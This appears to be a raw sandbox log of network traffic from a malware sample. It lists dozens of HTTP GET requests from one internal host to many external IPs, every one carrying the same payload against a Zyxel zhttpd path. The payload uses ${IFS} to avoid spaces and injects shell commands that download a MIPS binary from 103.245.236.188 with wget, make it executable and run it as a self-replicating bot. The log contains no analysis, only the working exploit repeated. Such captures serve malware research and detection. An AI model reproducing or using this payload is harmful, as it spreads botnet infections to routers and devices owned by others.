                                                Jan 12, 2024 18:16:29.608144045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6143192.168.2.2338996129.222.146.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608185053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6144192.168.2.235495097.37.28.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608220100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6145192.168.2.234246477.161.34.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608262062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6146192.168.2.234562017.103.130.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608314037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6147192.168.2.233310871.236.120.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608355045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6148192.168.2.234647286.78.254.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608371973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6149192.168.2.235986672.111.70.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608423948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6150192.168.2.2359940108.13.102.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608477116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6151192.168.2.234434212.132.186.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608505964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6152192.168.2.2359482158.12.101.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608545065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6153192.168.2.235425681.76.46.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.612232924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6154192.168.2.2341674218.236.114.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.612260103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6155192.168.2.233999032.77.152.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.612315893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6156192.168.2.2356958119.204.15.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.612351894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6157192.168.2.2347084157.119.193.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.612396002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6158192.168.2.2356252150.87.97.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.621957064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6159192.168.2.235830672.104.41.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.621982098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6160192.168.2.2354688147.109.234.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622036934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6161192.168.2.235923644.42.255.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622088909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6162192.168.2.233852060.96.73.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622126102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6163192.168.2.233652646.221.210.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622149944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6164192.168.2.2336926137.190.249.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622205973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6165192.168.2.234849440.168.194.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622236967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6166192.168.2.2340498209.115.9.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622261047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6167192.168.2.2357182164.52.241.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622312069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6168192.168.2.2354066175.130.193.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622360945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6169192.168.2.2344654201.95.114.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622396946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6170192.168.2.235964852.200.194.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622427940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6171192.168.2.2354138104.226.160.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622493029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6172192.168.2.2345886167.164.56.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622513056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6173192.168.2.234734485.209.181.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622564077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6174192.168.2.2353548114.138.205.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622612953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6175192.168.2.234020835.109.160.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622654915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6176192.168.2.2348598126.101.253.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622684002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6177192.168.2.2339228213.174.124.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622740984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6178192.168.2.234887258.248.144.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622793913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6179192.168.2.2334706207.114.26.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622839928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6180192.168.2.2344362121.210.5.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622893095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6181192.168.2.233392086.84.236.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622936964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6182192.168.2.2358888201.19.34.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.622967958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6183192.168.2.234001834.131.106.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623035908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6184192.168.2.2340196170.1.208.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623064995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6185192.168.2.2338254180.195.249.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623099089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6186192.168.2.23386641.14.249.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623146057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6187192.168.2.233814214.143.117.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623167038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6188192.168.2.234230812.113.61.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623197079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6189192.168.2.2339072194.93.210.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623228073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6190192.168.2.2339774213.194.86.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623275042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6191192.168.2.234252487.22.155.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623327017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192192.168.2.2349770149.78.105.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623356104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6193192.168.2.2352268117.16.126.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623397112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6194192.168.2.2335880134.245.166.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623433113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6195192.168.2.2353564191.213.154.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623486042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6196192.168.2.2334774209.132.242.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623523951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6197192.168.2.234710469.111.26.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623565912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6198192.168.2.2360082175.162.123.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623617887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6199192.168.2.2346220172.98.79.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623656034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6200192.168.2.2360926112.13.136.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623687983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6201192.168.2.2344432110.165.22.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623716116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6202192.168.2.234463054.107.57.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623764992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6203192.168.2.234315654.93.60.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623814106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6204192.168.2.234623077.86.106.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623855114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6205192.168.2.2341042178.17.198.14443
                                                TimestampBytes transferredDirectionData
